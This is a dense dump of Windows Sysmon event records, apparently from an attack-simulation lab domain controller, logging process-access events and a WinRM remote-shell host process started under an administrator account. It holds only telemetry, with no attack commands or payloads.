13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002776Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002775Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002774Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002773Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002772Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8569-5FCF-8300-000000009101}42404260C:\Windows\system32\conhost.exe{10ACEC4A-8569-5FCF-8200-000000009101}4228C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002770Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002769Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8541-5FCF-1500-000000009101}13641688C:\Windows\system32\svchost.exe{10ACEC4A-8569-5FCF-8000-000000009101}4152C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002768Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002767Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002766Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002765Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002764Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002763Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002762Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002761Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002760Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002759Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.320{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8569-5FCF-8300-000000009101}4240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002758Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.320{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8569-5FCF-8200-000000009101}4228C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002757Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8569-5FCF-8200-000000009101}4228C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002756Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.329{10ACEC4A-8569-5FCF-8200-000000009101}4228C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-8564-5FCF-5D27-050000000000}0x5275d0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002755Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002754Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+52568|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002753Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002752Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8569-5FCF-8000-000000009101}4152C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 